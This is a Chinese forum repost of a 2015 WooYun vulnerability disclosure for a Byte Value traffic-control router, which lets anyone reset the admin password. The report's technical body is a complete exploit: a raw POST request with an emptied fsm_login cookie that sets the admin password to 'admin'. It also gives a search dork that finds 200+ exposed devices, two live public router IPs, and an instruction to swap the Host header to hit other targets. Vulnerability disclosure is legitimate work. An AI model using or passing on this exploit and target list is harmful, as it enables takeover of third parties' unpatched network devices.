发新话题
打印

百为流控路由管理员密码重置漏洞

百为流控路由管理员密码重置漏洞

漏洞概要
缺陷编号:        WooYun-2015-99869
漏洞标题:        百为流控路由管理员密码重置漏洞
相关厂商:        深圳市百为百达科技开发有限公司
漏洞作者:        10457793
提交时间:        2015-03-09 12:24
公开时间:        2015-04-30 18:48
漏洞类型:        设计不当
危害等级:        高
自评Rank:        20
漏洞状态: 未联系到厂商或者厂商积极忽略
漏洞来源:        http://www.wooyun.org
Tags标签: 无

漏洞详情披露状态:
2015-03-09:        积极联系厂商并且等待厂商认领中,细节不对外公开
2015-04-30:        厂商已经主动忽略漏洞,细节向公众公开

简要描述:RT
详细说明:RT

案例百度可以搜索到200+

intitle:bytevalue

百度第4页至第31页都是,估计还有很多没有被检索到的。


漏洞证明:演示地址


code 区域http://220.161.90.230:2011/
http://61.156.217.133:2011

POST数据如下


code 区域POST /goform/webForm HTTP/1.0
Referer: http://61.156.217.133:2011/maint/admin.htm?opener=home
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Accept: */*
Accept-Language: zh-CN
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 61.156.217.133:2011
Content-Length: 52
DNT: 1
Pragma: no-cache
Cookie: fsm_u=admin; fsm_login=

cmd=MODIFY_PWD&json=%7B%22NewPwd%22%3A%22admin%22%7D

正常请求中包含fsm_login的值,为权限验证值







直接删掉fsm_login的值更换host即可绕过权限验证



修改host即可实现攻击不同目标,将admin用户密码修改为admin

返回如下信息标示修改成功









登录







修复方案:

版权声明:转载请注明来源 10457793@乌云

漏洞回应
厂商回应:未能联系到厂商或者厂商积极拒绝
原文:http://www.wooyun.org/bugs/wooyun-2015-099869


[ 本帖最后由 linda 于 2016-1-12 18:35 编辑 ]

TOP

发新话题